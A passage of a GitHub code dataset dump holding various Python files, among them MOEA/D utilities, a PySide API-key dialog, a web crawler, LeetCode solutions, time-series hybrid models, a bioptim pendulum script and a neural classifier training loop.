1\n\n temp1 = list(combinations(np.arange(H1 + M - 1), M - 1))\n temp1 = np.array(temp1)\n temp2 = np.arange(M - 1)\n temp2 = np.tile(temp2, (int(self.comb(H1 + M - 1, M - 1)), 1))\n W = temp1 - temp2\n W = (np.concatenate((W, np.zeros((np.size(W, 0), 1)) + H1), axis=1) - np.concatenate(\n (np.zeros((np.size(W, 0), 1)), W), axis=1)) / H1\n\n if H1 < M:\n H2 = 0\n while (self.comb(H1 + M - 1, M - 1) + self.comb(H2 + M, M - 1) <= N):\n H2 = H2 + 1\n if H2 > 0:\n temp1 = list(combinations(np.arange(H2 + M - 1), M - 1))\n temp1 = np.array(temp1)\n temp2 = np.arange(M - 1)\n temp2 = np.tile(temp2, (int(self.comb(H2 + M - 1, M - 1)), 1))\n W2 = temp1 - temp2\n W2 = (np.concatenate((W2, np.zeros((np.size(W2, 0), 1)) + H2), axis=1) - np.concatenate(\n (np.zeros((np.size(W2, 0), 1)), W2), axis=1)) / H2\n W = np.concatenate((W, W2 / 2 + 1 / (2 * M)), axis=0)\n\n realN = np.size(W, 0)\n W[W == 0] = 10 ** (-6)\n if N!=realN:\n raise Exception(\"Population size unaivailable for the specified number of objectives.\")\n return W, realN\n except Exception as error:\n print(\"Error while defining the weight vectors: \" + repr(error))\n\n # Define the neighborhoods\n def FindNeighbour(self, W, N, M, T):\n B = []\n for i in range(N):\n temp = []\n for j in range(N):\n distance = 0\n for k in range(M):\n distance += (W[i][k] - W[j][k]) ** 2\n distance = np.sqrt(distance)\n temp.append(distance)\n index = np.argsort(temp)\n B.append(index[:T])\n return B\n\n\n #set the initial reference point\n def find_best(self, population):\n z = [np.inf for i in range(len(population.population[0].objectives))]\n for individual in population:\n for i in range(len(z)):\n if individual.objectives[0] < z[i]:\n z[i] = individual.objectives[0]\n return z\n\n #update reference point\n def update_reference_point(self, y, z):\n for j in range(len(z)):\n if self.problem.directions[j] == \"max\":\n if y.objectives[j] > z[j]:\n z[j] = y.objectives[j]\n else:\n if y.objectives[j] < z[j]:\n z[j] = y.objectives[j]\n\n def Tchebycheff(self, individual, weight, z):\n temp = []\n for i in range(len(individual.objectives)):\n temp.append(weight[i] * np.abs(individual.objectives[i] - z[i]))\n\n return np.max(temp)","repo_name":"mbdemoraes/IEEE_RandomForestHyperParameters","sub_path":"common/moead_utils.py","file_name":"moead_utils.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11684996271","text":"from PySide6.QtWidgets import (\n QCheckBox,\n QDialog,\n QDialogButtonBox,\n QVBoxLayout,\n QLabel,\n QLineEdit,\n)\n\nclass ApiKeyDialog(QDialog):\n\tdef __init__(self, parent=None):\n\t\tsuper().__init__(parent)\n\t\tself.setWindowTitle(\"Your OpenAI API Key\")\n\n\t\tself.api_key_label = QLabel(\"API Key:\")\n\t\tself.api_key_edit = QLineEdit()\n\t\tself.api_key_edit.setEchoMode(QLineEdit.Password)\n\t\tself.button_box = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n\t\tself.save_checkbox = QCheckBox(\"Save API Key\")\n\t\tself.button_box.accepted.connect(self.accept)\n\t\tself.button_box.rejected.connect(self.reject)\n\n\t\tmain_layout = QVBoxLayout()\n\t\tmain_layout.addWidget(self.api_key_label)\n\t\tmain_layout.addWidget(self.api_key_edit)\n\t\tmain_layout.addWidget(self.save_checkbox)\n\t\tmain_layout.addWidget(self.button_box)\n\n\t\tself.setLayout(main_layout)\n\n\tdef api_key(self) -> str:\n\t\treturn self.api_key_edit.text()\n\n\tdef save_api_key(self) -> bool:\n\t\treturn self.save_checkbox.isChecked()\n","repo_name":"aldorvv/openai-pyside-client","sub_path":"ui/api_key_dialog.py","file_name":"api_key_dialog.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14361508482","text":"class Pilha():\n def __init__(self):\n self.data = [] # para criar um pilha\n\n def append(self,valor):\n self.data.append(valor) #adiciona no ultimo da pilha\n\n def pop(self):\n return self.data.pop() #remove e retorna o ultimo da pilha\n\n def isEmpty(self):\n return len(self.data) == 0\n\ndef validar(expressao):\n p = Pilha() \n for i in expressao:\n if i == '(':\n p.append(i)\n elif i == ')':\n if p.isEmpty():\n return False\n p.pop()\n return p.isEmpty\n\np = Pilha()\npalavra = \"uepb\"\np_invertido = '' #variavel string nula\nfor i in palavra: #i=u, i=e, i=p, i=b\n p.append(i) #pilha recebe cada elemento\nfor i in range(len(palavra)):\n p_invertido = p_invertido + p.pop() #pilha recebe o return do ultimo elemento\nprint(p_invertido)\n \n\n#exp = '()()'\n#print(validar(exp))","repo_name":"Gabrielgln/CodigosFaculdade","sub_path":"Python_2022.1/Unidade1/EstruturaDeDados-Pilha.py","file_name":"EstruturaDeDados-Pilha.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26174724313","text":"#!/usr/bin/env python3\n\nimport datetime\nimport random\nimport re\nimport ssl\nfrom bs4 import BeautifulSoup as bs\nfrom urllib.parse import urlparse\nfrom urllib.request import urlopen\n\npages = set()\ncontext = ssl._create_unverified_context()\nrandom.seed(datetime.datetime.now())\n\n# Retrieves a list of all internal links found on a page\ndef get_internal_links(bs_obj, include_url):\n include_url = (urlparse(include_url).scheme +\n '://' +\n urlparse(include_url).netloc)\n internal_links = []\n\n # Find all links beginning with '/'\n for link in bs_obj.findaAll(\n 'a', href = re.compile('^(/|.*' + include_url + ')')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in internal_links:\n if link.attrs['href'].startswith('/'):\n internal_links.append(include_url + link.attrs['href'])\n else:\n internal_links.append(link.attrs['href'])\n\n return internal_links\n\n# Retrieve a list of external links found on page\ndef get_external_links(bs_obj, exclude_url):\n external_links = []\n\n # Finds links starting with 'http' not containing the current url\n for link in bs_obj.findAll(\n 'a', href = re.compile('^(http|www)((?!' + exclude_url + ').)*$')):\n\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in external_links:\n external_links.append(link.attrs['href'])\n\n return external_links\n\ndef get_random_external_link(starting_page):\n html = urlopen(starting_page, context = context)\n bs_obj = bs(html, 'html.parser')\n external_links = get_external_links(bs_obj, urlparse(starting_page).netloc)\n\n if len(external_links) == 0:\n print('No external links, looking in the site for one...')\n domain = (urlparse(starting_page).scheme +\n '://' +\n urlparse(starting_page).netloc)\n internal_links = get_internal_links(bs_obj, domain)\n\n return get_random_external_link(\n internal_links[random.randint(0, len(internal_links) - 1)])\n else:\n return external_links[random.randint(0, len(external_links) - 1)]\n\ndef follow_external_only(starting_site):\n external_link = get_random_external_link(starting_site)\n print('Following random external link:' + external_link)\n\n follow_external_only(external_link)\n\nfollow_external_only('http://oreilly.com')\n\n \n \n","repo_name":"damiansp/webscraping","sub_path":"net_crawl.py","file_name":"net_crawl.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"532116331","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 23 12:09:08 2019\n\nmain file\n\n@author: tadahaya\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--lower\", default=False)\nargs = parser.parse_args()\n\ndef main():\n hello = \"Hello World!\"\n if args.lower:\n hello = hello.lower()\n print(hello)\n\ndef main2():\n goodbye = \"Goodbye World!\"\n if args.lower:\n goodbye = goodbye.lower()\n print(goodbye)\n\n# not necessary when entry_points are used\nif __name__ == \"__main__\":\n main()","repo_name":"mizuno-group/cli_package","sub_path":"mymodule/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38765156329","text":"\"\"\"\nGiven a non-empty integer array, find the minimum number of moves required to make all array elements equal, where a move is incrementing a selected element by 1 or decrementing a selected element by 1.\n\nYou may assume the array's length is at most 10,000.\n\nExample:\n\nInput:\n[1,2,3]\n\nOutput:\n2\n\nExplanation:\nOnly two moves are needed (remember each move increments or decrements one element):\n\n[1,2,3] => [2,2,3] => [2,2,2]\n\"\"\"\n\n\n# find median point, statistics in python 3.4 \nfrom statistics import median\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n m = median(nums)\n result = 0\n for x in nums:\n result += abs(x-m)\n return result\n \n\n# similar to \"meeting point\" problem\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.sort() # O(n*logn)\n i,j = 0,len(nums)-1\n count = 0\n while i < j: # O(n)\n count += nums[j] - nums[i]\n i += 1\n j -= 1\n return count \n\n\n# quick select, find median\n# https://en.wikipedia.org/wiki/Quickselect\n# when nums is a long list, RecursionError: maximum recursion depth exceeded in comparison\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \n\n def select_kth(k, nums, start, end):\n # pivot is the kth smallest element \n pivot = nums[end] # start with random pivot, here must start with end \n left, right = start, end\n while True:\n while (left < right) and (nums[left] < pivot):\n left += 1\n while (left < right) and (nums[right] >= pivot):\n right -= 1\n if left == right:\n break\n nums[left], nums[right] = nums[right], nums[left] # swap \n nums[left], nums[end] = nums[end], nums[left] # swap \n if k == left+1:\n return pivot\n elif k < left+1:\n return select_kth(k, nums, start, left-1)\n else: # k > left\n return select_kth(k, nums, left+1, end)\n \n \n def find_median(nums):\n return select_kth(len(nums)//2+1, nums, 0, len(nums)-1)\n \n \"\"\"\n def find_median(nums):\n if len(nums)%2: # odd length \n return select_kth(len(nums)//2, nums, 0, len(nums)-1)\n else: # even length\n left = select_kth((len(nums)-1)//2, nums, 0, len(nums)-1)\n right = select_kth((len(nums)+1)//2, nums)\n return (left+right)/2\n \"\"\"\n \n result = 0\n median = find_median(nums)\n for x in nums:\n result += abs(median-x)\n return result\n \n \n\n# pythonic \n\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n median = sorted(nums)[len(nums)//2]\n return sum([abs(n-median) for n in nums])\n\n\n\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.sort()\n return sum([nums[~i]-nums[i] for i in range(len(nums)//2)])\n\n# ~ operator: \n# operator.inv(obj)\n# operator.invert(obj)\n# operator.__inv__(obj)\n# operator.__invert__(obj)\n# Return the ```bitwise inverse of the number obj```. This is equivalent to ~obj.\n# 0, 1, 2, ... get turned into -1, -2, -3, ...\n# nums[~i] - nums[i] if i = 0\n# nums[-1] - nums[0]\n \n \ns = Solution()\nnum = [1,2,4]\nc = s.minMoves2(num)\nprint(c)\n","repo_name":"rarezhang/leetcode","sub_path":"math/462.MinimumMovestoEqualArrayElementsII.py","file_name":"462.MinimumMovestoEqualArrayElementsII.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38857980034","text":"import pandas as pd \nimport numpy as np\nfrom sklearn import preprocessing\nimport src.time_series_functions as tsf\n\n\ndef fit_sklearn_model(ts, model, test_size, val_size):\n \"\"\"\n Parameters: \n ts (pandas.DataFrame): time series values created by \n src.time_series_functions.create_windowing\n model (Sklearn Model): base model to predict ts\n test_size (int): size of test set\n val_size (int): size of validation set (if you do not use validation set, \n val_size can be set as 0)\n\n Returns: \n Sklearn Model: trained model\n \"\"\"\n\n train_size = len(ts) - test_size - val_size\n y_train = ts['actual'][0:train_size]\n x_train = ts.drop(columns=['actual'], axis=1)[0:train_size]\n\n return model.fit(x_train, y_train)\n\n\ndef predict_sklearn_model(ts, model):\n \"\"\"\n Parameters: \n ts (pandas.DataFrame): time series values created by \n src.time_series_functions.create_windowing\n model (Sklearn Model): base model to predict ts\n \n Returns: \n numpy array: predicted values\n \"\"\"\n\n x = ts.drop(columns=['actual'], axis=1)\n return model.predict(x)\n\ndef additive_hybrid_model(predicted, real, time_window, base_model,\n test_size, val_size):\n \"\"\"\n Parameters: \n real (numpy array): real values of time series \n predicted (numpy array): linear prediction of the time series\n time_window (int): time window of error prediction model\n base_model (Sklearn model): base model to predict the error\n test_size (int): size of test set\n val_size (int): size of validation set (if you do not use validation set, \n val_size can be set as 0)\n\n Returns: \n dict: following the src.time_series_functions.make_metrics_avaliation format\n \"\"\"\n\n train_size = len(predicted) - test_size\n\n errors = np.subtract(real, predicted)\n\n min_max_scaler = preprocessing.MinMaxScaler()\n min_max_scaler.fit(errors[0:train_size].reshape(-1, 1))\n normalized_error = min_max_scaler.transform(errors.reshape(-1, 1))\n\n # fit_predict\n\n error_values = pd.DataFrame({'actual': normalized_error.flatten()})\n\n error_windowed = tsf.create_windowing( df=error_values, lag_size=time_window)\n\n pi = fit_sklearn_model(ts=error_windowed, model=base_model,\n test_size=test_size, val_size=val_size)\n\n pi_pred = predict_sklearn_model(ts=error_windowed, model=pi)\n # _____________________________\n\n pi_pred = min_max_scaler.inverse_transform(pi_pred.reshape(-1, 1)).flatten()\n\n prevs = predicted[time_window:] + pi_pred\n\n ts_actual = real[time_window:]\n\n return tsf.make_metrics_avaliation(ts_actual, prevs, test_size,\n val_size, base_model.get_params(deep=True))\n\ndef format_nolic_input(real, nonlinear_forecast, linear_forecast, test_size, time_window):\n \"\"\"\n Parameters: \n real (numpy array): real values of time sries \n linear_forecast (numpy array): linear prediction of the time series\n nonlinear_forecast (numpy array): additive hibrid system prediction\n time_window (int): time window of error prediction model\n test_size (int): size of test set\n\n Returns: \n pandas DataFrame: format of input x output\n sklearn preprocessing: data normalization model\n \"\"\"\n train_size_represents = len(real) - test_size\n \n error_values = nonlinear_forecast - linear_forecast\n\n min_max_scaler = preprocessing.MinMaxScaler()\n min_max_scaler.fit(real[0:train_size_represents].reshape(-1, 1))\n\n min_max_scaler_linear = preprocessing.MinMaxScaler()\n min_max_scaler_linear.fit(linear_forecast[0:train_size_represents].reshape(-1, 1))\n\n min_max_scaler_error = preprocessing.MinMaxScaler()\n min_max_scaler_error.fit(error_values[0:train_size_represents].reshape(-1, 1))\n\n real_normalized = min_max_scaler.transform(real.reshape(-1, 1)).flatten()\n linear_normalized = min_max_scaler_linear.transform(linear_forecast.reshape(-1, 1)).flatten()\n error_normalized = min_max_scaler_error.transform(error_values.reshape(-1, 1)).flatten()\n \n tsf_part = tsf.create_windowing(lag_size=(time_window - 1),\n df=pd.DataFrame({'actual': linear_normalized}))\n\n ef_part = tsf.create_windowing(lag_size=(time_window - 1),\n df=pd.DataFrame({'actual': error_normalized}))\n\n real_part = tsf.create_windowing(lag_size=(time_window - 1),\n df=pd.DataFrame({'actual': real_normalized}))\n\n tsf_part.columns = ['ts_prev' + str(i) for i in reversed(range(0, time_window))]\n ef_part.columns = ['error_prev' + str(i) for i in reversed(range(0, time_window))]\n\n ts_formated = pd.concat([ef_part, tsf_part,\n real_part['actual']], axis=1)\n return ts_formated, min_max_scaler\n\ndef nolic_model(linear_forecast, real, nonlinear_forecast,time_window, \n base_model, test_size,val_size):\n\n \"\"\"\n Parameters: \n real (numpy array): real values of time series \n linear_forecast (numpy array): linear prediction of the time series\n nonlinear_forecast (numpy array): additive hibrid system prediction\n time_window (int): time window of error prediction model\n base_model (Sklearn model): base model to combine the linear e nonlinear prediction\n test_size (int): size of test set\n val_size (int): size of validation set (if you do not use validation set, \n val_size can be set as 0)\n\n Returns: \n dict: following the src.time_series_functions.make_metrics_avaliation format\n \"\"\"\n\n ts_formated, min_max_scaler= format_nolic_input(real, nonlinear_forecast, linear_forecast, test_size, time_window)\n\n p = fit_sklearn_model(ts=ts_formated, model=base_model,\n test_size=test_size, val_size=val_size)\n\n pred = predict_sklearn_model(ts=ts_formated,\n model=p)\n\n pred = min_max_scaler.inverse_transform(pred.reshape(-1, 1)).flatten()\n\n real_actual = real[(time_window - 1):]\n \n result_metrics = tsf.make_metrics_avaliation(real_actual, pred, test_size,\n val_size, base_model.get_params(deep=True))\n return result_metrics\n","repo_name":"domingos108/time_series_functions","sub_path":"src/hybrid_systems.py","file_name":"hybrid_systems.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"78"} +{"seq_id":"32412086424","text":"from csv import DictReader, reader\n\nwith open(\"fighters.csv\", \"r\") as file:\n csv_reader = reader(file, delimiter=\",\") # gives an iterator\n next(csv_reader)\n for fighter in csv_reader:\n print(f\"{fighter[0]} is from {fighter[1]}\")\n\n\nwith open(\"fighters.csv\", \"r\") as file:\n csv_reader = reader(file, delimiter=\",\")\n data = list(csv_reader)\n for fighter in data:\n print(f\"{fighter[0]} is from {fighter[1]}\")\n\n\nwith open(\"fighters.csv\") as file:\n csv_reader = DictReader(file)\n\n for fighter in csv_reader:\n print(fighter[\"Name\"])\n","repo_name":"JamesMcGahn/Projects","sub_path":"Learning & Demos/Python/Simple/Basics/FileIO/reading_csv.py","file_name":"reading_csv.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10055302753","text":"\"\"\"empty message\n\nRevision ID: 6aaae13c483c\nRevises: aa3499b09be2\nCreate Date: 2016-09-23 15:26:13.039992\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '6aaae13c483c'\ndown_revision = 'aa3499b09be2'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('work_day',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=80), nullable=True),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('work_day')\n ### end Alembic commands ###\n","repo_name":"shelbyneilsmith/sescst","sub_path":"migrations/versions/6aaae13c483c_.py","file_name":"6aaae13c483c_.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17780393572","text":"import os\nimport h5py\nimport imageio\nfrom pybdv.metadata import get_data_path\n\n\ndef parse_coordinate(coord):\n coord = coord.rstrip('\\n')\n pos_start = coord.find('(') + 1\n pos_stop = coord.find(')')\n coord = coord[pos_start:pos_stop]\n coord = coord.split(',')\n coord = [float(co) for co in coord]\n assert len(coord) == 3, \"Coordinate conversion failed\"\n return coord\n\n\ndef get_res_level(level=None):\n res0 = [.01, .01, .025]\n res1 = [.02, .02, .025]\n resolutions = [res0] + [[re * 2 ** i for re in res1] for i in range(8)]\n if level is None:\n return resolutions\n else:\n assert level <= 6,\\\n \"Scale level %i is not supported, only supporting up to level 8\" % level\n return resolutions[level]\n\n\n# TODO figure out compression in imageio\ndef save_tif_stack(raw, save_file):\n try:\n imageio.volwrite(save_file, raw)\n return True\n except RuntimeError:\n print(\"Could not save tif stack, saving slices to folder %s instead\"\n % save_file)\n save_tif_slices(raw, save_file)\n\n\ndef save_tif_slices(raw, save_file):\n save_folder = os.path.splitext(save_file)[0]\n os.makedirs(save_folder, exist_ok=True)\n for z in range(raw.shape[0]):\n out_file = os.path.join(save_folder, \"z%05i.tif\" % z)\n imageio.imwrite(out_file, raw[z])\n\n\ndef save_tif(raw, save_file):\n if imageio is None:\n save_tif_slices(raw, save_file)\n else:\n if not save_tif_stack(raw, save_file):\n save_tif_slices(raw, save_file)\n\n\ndef name_to_path(name):\n name_dict = {'raw': 'images/sbem-6dpf-1-whole-raw.xml',\n 'cells': 'segmentations/sbem-6dpf-1-whole-segmented-cells-labels.xml',\n 'nuclei': 'segmentations/sbem-6dpf-1-whole-segmented-nuclei-labels.xml',\n 'cilia': 'segmentations/sbem-6dpf-1-whole-segmented-cilia-labels.xml',\n 'chromatin': 'segmentations/sbem-6dpf-1-whole-segmented-chromatin-labels.xml'}\n assert name in name_dict, \"Name must be one of %s, not %s\" % (str(name_dict.keys()),\n name)\n return name_dict[name]\n\n\ndef name_to_base_scale(name):\n scale_dict = {'raw': 0,\n 'cells': 1,\n 'nuclei': 3,\n 'cilia': 0,\n 'chromatin': 1}\n return scale_dict[name]\n\n\ndef cutout_data(tag, name, scale, bb_start, bb_stop):\n assert all(sta < sto for sta, sto in zip(bb_start, bb_stop))\n\n path = os.path.join('data', tag, name_to_path(name))\n path = get_data_path(path, return_absolute_path=True)\n resolution = get_res_level(scale)\n\n base_scale = name_to_base_scale(name)\n assert base_scale <= scale, \"%s does not support scale %i; minimum is %i\" % (name, scale, base_scale)\n data_scale = scale - base_scale\n\n bb_start_ = [int(sta / re) for sta, re in zip(bb_start, resolution)][::-1]\n bb_stop_ = [int(sto / re) for sto, re in zip(bb_stop, resolution)][::-1]\n bb = tuple(slice(sta, sto) for sta, sto in zip(bb_start_, bb_stop_))\n\n key = 't00000/s00/%i/cells' % data_scale\n with h5py.File(path, 'r') as f:\n ds = f[key]\n data = ds[bb]\n return data\n\n\n# TODO support bdv-hdf5 as additional format\ndef to_format(path):\n ext = os.path.splitext(path)[1]\n if ext.lower() in ('.hdf', '.hdf5', '.h5'):\n return 'hdf5'\n elif ext.lower() in ('.n5',):\n return 'n5'\n elif ext.lower() in ('.tif', '.tiff'):\n return 'tif-stack'\n elif ext.lower() in ('.zr', '.zarr'):\n return 'zarr'\n else:\n print('Could not match', ext, 'to data format. Displaying the data instead')\n return 'view'\n\n\ndef save_data(data, path, save_format, name):\n if save_format == 'hdf5':\n with h5py.File(path) as f:\n f.create_dataset(name, data=data, compression='gzip')\n elif save_format in ('n5', 'zarr'):\n import z5py # import here, because we don't want to make z5py mandatory dependency\n with z5py.File(path, use_zarr_format=save_format == 'zarr') as f:\n f.create_dataset(name, data=data, compression='gzip',\n chunks=(64, 64, 64))\n elif save_format == 'tif-stack':\n save_tif_stack(data, path)\n elif save_format == 'tif-slices':\n save_tif_slices(data, path)\n elif save_format == 'view':\n from cremi_tools.viewer.volumina import view\n view([data])\n else:\n raise RuntimeError(\"Unsupported format %s\" % save_format)\n\n\ndef make_cutout(tag, name, scale, bb_start, bb_stop, out_path, out_format=None):\n data = cutout_data(tag, name, scale, bb_start, bb_stop)\n out_format = to_format(out_path) if out_format is None else out_format\n assert out_format in ('hdf5', 'n5', 'tif-stack', 'tif-slices', 'zarr', 'view'), \"Invalid format:\" % out_format\n data = cutout_data(tag, name, scale, bb_start, bb_stop)\n save_data(data, out_path, out_format, name)\n","repo_name":"mobie/platybrowser-project","sub_path":"mmpb/export/extract_subvolume.py","file_name":"extract_subvolume.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"24822757214","text":"\"\"\"\nA optimal control program consisting in a triple pendulum starting downward and ending upward\nwhile requiring the minimum of generalized forces. The solver is only allowed to move the pendulum sideways.\n\"\"\"\n\n\nimport biorbd_casadi as biorbd\nfrom bioptim import (\n OptimalControlProgram,\n DynamicsFcn,\n Dynamics,\n Bounds,\n QAndQDotBounds,\n InitialGuess,\n ObjectiveFcn,\n Objective,\n)\n\nbiorbd_model = biorbd.Model(\"Triple_Pendulum.bioMod\")\n#biorbd_model = biorbd.Model(\"pendulum.bioMod\")\n#bioviz.Viz(\"Triple_Pendulum.bioMod\").exec()\n\n# Dynamics definition\ndynamics = Dynamics(DynamicsFcn.TORQUE_DRIVEN)\n# State Boundaries conditions\nx_bounds = QAndQDotBounds(biorbd_model)\n#minimal and maximal bounds\n# for all the degrees of freedom and velocities on three columns corresponding\n# to the starting node, the intermediate nodes and the final node\nx_bounds[:,[0,-1]]=0\nx_bounds[0,-1]=3.14\n\n# Control Boundary conditions\nu_bounds = Bounds([-100, -50, -10], [100, 50, 10])\n\n# Objectif controls\nobjective_functions = Objective(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key=\"tau\")\n\n#Initial Guess\nx_init = InitialGuess([0, 0, 0, 0, 0, 0])\nu_init = InitialGuess([0, 0, 0])\n\n# Optimal Control Problem\nocp = OptimalControlProgram(\n biorbd_model,\n dynamics,\n n_shooting=20,\n phase_time=4,\n x_init=x_init,\n u_init=u_init,\n x_bounds=x_bounds,\n u_bounds=u_bounds,\n objective_functions=objective_functions,\n n_threads=8\n )\n\nsol = ocp.solve(show_online_optim=False)\n\n# sol.graphs()\n\nimport bioviz\nsol.animate()","repo_name":"Ipuch/My_bioptim_examples","sub_path":"Triple_Pendulum/torque_driven_triple_pendulum.py","file_name":"torque_driven_triple_pendulum.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"30643069798","text":"import time\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom itertools import count\n\nfrom utilities.utils import *\n\n\nresult_log = \"Top_{}: precision: {:.4f}, recall: {:.4f}, F1: {:.4f}, \" + \\\n \"hits_score: {:.4f}, hits@3 score: {:.4f}, hits@5 score: {:.4f}\"\n\n\ndef train_classifier(classifier, author_agent, ment_agent, embeddings,\n train_data, valid_data, l2, device, max_epoch, best_f1=0):\n print(f\"Training classifier, now is {time.ctime(time.time())}\")\n optimizer = optim.Adam([{\"params\": classifier.parameters()},\n {\"params\": embeddings.parameters()}],\n weight_decay=l2)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, 'max', factor=0.1, patience=2, threshold_mode='abs')\n for epoch in count(1):\n current_lr = optimizer.state_dict()[\"param_groups\"][0][\"lr\"]\n print(\"Epoch: \", epoch, \" lr: \", current_lr)\n train_epoch(\n classifier, author_agent, ment_agent, embeddings,\n train_data, optimizer, device)\n if epoch % 1 == 0:\n f1 = valid_epoch(\n classifier, author_agent, ment_agent, embeddings,\n valid_data, device)\n if f1 > best_f1:\n best_f1 = f1\n torch.save(\n classifier.state_dict(), \"parameter/classifier\")\n torch.save(\n embeddings.state_dict(), \"parameter/embeddings\")\n print(\"Weights saved @ f1 = {:.3f}\".format(best_f1))\n scheduler.step(f1)\n\n if current_lr < 1e-6 or epoch >= max_epoch:\n print(f\"Classifier traning is stopped, lr is {current_lr}\")\n classifier.load_state_dict(\n torch.load(\"parameter/classifier\"))\n embeddings.load_state_dict(\n torch.load(\"parameter/embeddings\"))\n embeddings.to(device), classifier.to(device)\n print(\n \"Load best model in this training episode, f1: {:.3f}\"\n .format(best_f1))\n print(f\"Classifier training stop at {time.ctime(time.time())}\")\n break\n\n return best_f1\n\n\ndef train_epoch(classifier, author_agent, ment_agent, embeddings,\n data_loader, optimizer, device, verbose=1):\n classifier.train(), embeddings.train()\n author_agent.eval(), ment_agent.eval()\n loss_total, acc_num, total_num = [], [], []\n total_num = 0\n\n for batch_idx, data in enumerate(data_loader):\n tweet, user_h, ment_h, target = [item.to(device) for item in data]\n # user_h: (batch, 33*200)\n\n optimizer.zero_grad()\n tweet, user_h, ment_h = map(embeddings, [tweet, user_h, ment_h])\n # user_h: (batch, 33*200, 300)\n\n user_h = user_h.view(-1, 200, 33, 300)\n ment_h = ment_h.view(-1, 200, 33, 300)\n\n author_agent.reset_buffer()\n ment_agent.reset_buffer()\n\n output = classifier(tweet, user_h, ment_h, author_agent, ment_agent)\n output = output.squeeze(dim=-1)\n batch_acc = output.ge(0).float() == target\n acc_num.append(\n torch.sum(batch_acc.long()).item())\n total_num += len(target)\n\n loss = F.binary_cross_entropy_with_logits(output, target)\n loss.backward()\n optimizer.step()\n loss_total.append(loss.item())\n\n if verbose > 0:\n print(\"Train: [{}/{}, {:.2f}%], loss: {:.4f}, acc: {:.4f}\".format(\n batch_idx+1, len(data_loader),\n 100 * (batch_idx+1) / len(data_loader),\n sum(loss_total)/(batch_idx+1), sum(acc_num)/total_num),\n end='\\r')\n if verbose > 0:\n print()\n\n\ndef valid_epoch(classifier, author_agent, ment_agent,\n embeddings, data_loader, device):\n classifier.eval(), embeddings.eval()\n author_agent.eval(), embeddings.eval()\n y_pred, y_test, acc_num = [], [], []\n total_num = 0\n\n for batch_idx, data in enumerate(data_loader):\n tweet, user_h, ment_h, target = [item.to(device) for item in data]\n tweet, user_h, ment_h = map(embeddings, [tweet, user_h, ment_h])\n\n user_h = user_h.view(-1, 200, 33, 300)\n ment_h = ment_h.view(-1, 200, 33, 300)\n\n author_agent.reset_buffer()\n ment_agent.reset_buffer()\n\n output = classifier(tweet, user_h, ment_h, author_agent, ment_agent)\n output = output.squeeze(dim=-1)\n batch_acc = output.ge(0).float() == target\n acc_num.append(\n torch.sum(batch_acc.long()).item())\n total_num += len(target)\n\n py = output.data\n y_pred.append(py)\n y_test.append(target)\n\n print(\"Test: [{}/{}, {:.2f}%], acc: {:.4f}\".format(\n batch_idx+1, len(data_loader),\n 100 * (batch_idx+1) / len(data_loader), sum(acc_num)/total_num),\n end='\\r')\n print()\n mrr = mrr_score(y_test, y_pred)\n bp = bpref(y_test, y_pred)\n print(\"MRR: {}, Bpref: {}\".format(mrr, bp))\n\n precision = precision_score(y_test, y_pred, k=1)\n recall = recall_score(y_test, y_pred, k=1)\n hscore = hits_score(y_test, y_pred, k=1)\n hits3 = hits_score(y_test, y_pred, k=3)\n hits5 = hits_score(y_test, y_pred, k=5)\n F1 = 2 * (precision * recall) / (precision + recall)\n print(result_log.format(1, precision, recall, F1, hscore, hits3, hits5))\n\n return 